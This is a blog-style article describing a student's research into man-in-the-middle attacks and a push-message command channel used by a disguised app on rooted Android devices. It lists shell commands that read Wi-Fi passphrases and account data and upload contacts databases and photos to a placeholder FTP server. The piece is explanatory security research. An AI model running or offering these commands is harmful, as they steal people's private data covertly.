Note: The following will only affect people who have rooted their Android smartphone or tablet.
As part of my dissertation when I was a student (I graduated July 2012 at Queen’s University Belfast) I decided to look into issues with Android security. This research focused on Man-in-the-middle (MITM) attacks (which anything Wi-Fi enabled is susceptible to) and what vulnerabilities a user could be exposed to by having a rooting their device.
First off, let’s have a quick look at MITM attacks. A MITM attack is when an intruder intercepts the connection between two endpoints (most likely to be a smartphone/laptop and a router) and relays the messages between them to the attacker with neither the smartphone or router aware this is going on. As a result, the attacker can -
- View login credentials and cookies attached to requests
- Intercept emails (see screenshot below)
- See images being downloaded
- Modify files on-the-fly
This is a common vulnerability in coffee shop or public Wi-Fi scenarios where it only takes a matter of minutes for an attacker to setup their vantage point. Popular tools which are used in this scenario are -
- arpspoof — Uses the ARP spoofing technique which a malicious actor sends falsified ARP (Address Resolution Protocol) messages over a local area network. Results in the linking of an attacker’s MAC address with the IP address of a legitimate computer or server on the network
- sslstrip (by Moxie Marlinspike @moxie) — Hijacks HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links.
Now, let’s go back to the title of this article and look at issues with Android specifically. To start off, what is rooting? To quote Wikipedia — “Rooting is the process of allowing users of smartphones, tablets, and other devices running the Android mobile operating system to attain privileged control (known as ‘root access’) within Android’s sub-system”. Why do it? It gives users full administrative control of their device just like Linux or any other Unix based operating system. This basically allows them to install or run any applications or commands they want without being restricted by the limitations brought on by carriers and manufacturers.
“Run any commands”
At first this sounds great, the possibilities are endless. The issue is they are not just limitless for you but for anyone (or anything) that has access to your device. The vulnerability I am going to talk about I call “Root Attack Through Cloud to Device Messaging”. Don’t worry, I’m not going to refer to it by that lengthy name for the rest of the article, let’s call it RATC2DM. It is important to note, that unlike MITM attacks, RATC2DM can be used on any network, and the locations of both the attacker can be anywhere in the world (they might even be 2000 miles away from their victim!). Even a VPN cannot protect them.
So what is Cloud to Device Messaging? Google’s C2DM service is used to provide push notifications on all Android devices. This simple, lightweight mechanism is used to tell apps that they should contact a remote server, download updates or that some other type of event has occurred (like being mentioned in a tweet or that you have been invited to play a game with someone on Facebook for the millionth time, that day).
One other thing it can be used for is to send malicious commands which are then interpreted by a mischievous app.
To give an example of this, I developed an Android application posing as a cinema listings viewer. When a user downloaded the application and attempted to install it, they could see it only required a small number of permissions and so did not suspect any malicious code. After installation, the application registered itself with the attacker’s web service using a registration ID generated from the C2DM service. The attacker could then this registration ID to send commands to the victims device at any time with the output or files then sent to the attacker’s web service. The types of commands that were used included -
- To get real time location data — dumpsys location
- List of accounts associated with the device — dumpsys accounts
- Unencrypted Wi-Fi data including keyphrases for access points — cat /data/misc/wifi/wpa_supplicant.conf
- To send SQLite databases containing unencrypted contacts to a web service — ftpput -u <username> -p <password> <ftp-address> <destination-file> <source-file>. In this case <source-file> was /data/data/com.android.providers.contacts/databases/contacts2.db
- Steal photographs from the users phone. Firstly, get list of files in the phones Camera folder — cd /sdcard/DCIM/Camera ; ls . Upload files individually using — ftpput -u <username> -p <password> <ftp-address> <destination-file> ‘/sdcard/DCIM/Camera/<photo-filename>’
Note: FTP was used at the time but there are plenty of other methods that could be used for file uploading.
Clearly it can be seen that an attacker has full control over a device as the user has given them root privileges. This applies to any application the user has installed. No indications about malicious activity were given, for this to happen; critical malware software would be required. As the attack was carried out over the internet, the time required to carry out the attack is only dependent on the speed of the internet connection for the device.
There are currently no exact numbers around how many people have rooted their devices, but if we look at CyanogenMod the most popular version open source version of Android based on the official releases of Android by Google, it has over 10 million downloads. Every single one of those users is vulnerable to RATC2DM